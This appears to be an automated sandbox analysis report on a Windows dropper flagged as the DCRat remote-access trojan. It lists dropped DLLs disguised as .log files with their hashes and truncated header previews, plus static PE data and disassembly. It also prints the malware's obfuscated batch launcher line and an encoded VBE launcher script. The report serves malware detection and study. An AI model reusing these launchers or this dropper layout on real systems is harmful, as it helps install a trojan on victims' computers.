SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 4%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QJNvoZJT.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 4%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SoilvDeL.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 9%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XieCzWia.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5% Antivirus: Virustotal, Detection: 4%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eOLjNPjM.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eQQkRcVr.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\egSCbkdO.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fNssmckm.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gRySjyoH.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hLTAIczh.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jTkAEhsC.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lGVRPIpa.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pwLIWFpU.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\qtmQsFEO.log

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sCEQoKxk.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vnjhvXId.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zdaXCUIW.log

Download File

Process:	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\reviewruntimeMonitor\BlockrefBrokerperf.exe

Download File

Process:	C:\Users\user\Desktop\o9jDrpZrgR.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat

Download File

Process:	C:\Users\user\Desktop\o9jDrpZrgR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.857868096041212
Encrypted:	false
SSDEEP:	3:b+AETbi2Vi0imEP4XLCJmPVATJp0Ax:b+vi2ViqXLC0tAT/b
MD5:	027418C1F52C54C2519A267460BF1214
SHA1:	F8E2F6AF10F7E8BF8A94DAF8EA953E18637C52D6
SHA-256:	9B0BECAC125E51675754B4363A01CF1619854897AA2B72FCE6ECD4BAE074B286
SHA-512:	93BAF1B964BF3219B45A08FF52EED669389E634B67E39FE8AC3EB913D86824074192794790802E2ACBA2B1E9119DA4520A123584D43B9BEA780BB5060711BF49
Malicious:	false
Preview:	%FiYvAhn%%wRBvrRgiN%..%YiFMNpGQ%"C:\reviewruntimeMonitor/BlockrefBrokerperf.exe"%lmQeqtqW%

C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe

Download File

Process:	C:\Users\user\Desktop\o9jDrpZrgR.exe
File Type:	data
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.8721052848438005
Encrypted:	false
SSDEEP:	6:GFtkvwqK+NkLzWbHyrFnBaORbM5nC++nMVO5AHI9:GFFMCzWLyhBaORbQC++nM3o9
MD5:	7D4BD2B9160E289AA7B92B5F13E5000F
SHA1:	FF50208F3523239764F6397B1D19909F4E0C45A8
SHA-256:	BA473C76F44D3537ADDD866EB8B5E59CF3BAC1776FBA6E0131B69E914EB706C4
SHA-512:	A5CC9E9C40208E2243BBF35990FA143F02EE62B6AE7EB65D5A89D8994E60378ACD497E71E76AE18709214871B91CEFDE18B38E7377BE2AA750E053B8B69EC1C5
Malicious:	false
Preview:	#@~^yQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vF{!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPr/=z..\b+hME.Oks+\W.kOGMzzoWDAhK95%w^LGwCk1qNK2n"la\| 8mYJS~Z~~0msk+QUEAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.6048426069826895
Encrypted:	false
SSDEEP:	12:PZ5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:LdUOAokItULVDv
MD5:	3772C8A6BE7A12366E9B4E96F4489643
SHA1:	4E93A70C1604E3A378B0A6330BD7C7C4CE7AB6DE
SHA-256:	815727123D8C135F839CC45D3AB906B47EEAC9FE23AF26CBBB5B931E56F975AA
SHA-512:	C19DF3B7E1A809E7B7093A8F8C60D7E60DEA489D8F7D614D454E815A16D7F92363B439E380FADBA1CCA0BEEED2915855BF168E79A3D6DE49DF4BE46A29759767
Malicious:	false
Preview:	..Pinging 045012 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.562432966697646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	o9jDrpZrgR.exe
File size:	1'622'827 bytes
MD5:	c256204deb01c77e21ba17b5e2411245
SHA1:	95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
SHA256:	f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
SHA512:	f3e1f38c059ce56801382c6de631d7b90077fa77a2eb997906d2f6eef8dafe38ab041f023a11b27da41b87edb16484fb095e1053e4b01204412f3a586cd34c52
SSDEEP:	24576:2TbBv5rUyXVZJQCx441vcF3iE0npCoc1cQhWdB7in6D+6:IBJLQCvvcF3KpSu
TLSH:	F975F7203DEB503AF173EFB55AE0759ADA6EF6B33707999E205003864713B80DD9163A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FB4D4DA4EABh
jmp 00007FB4D4DA47BDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB4D4D97607h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FB4D4DA7C4Fh
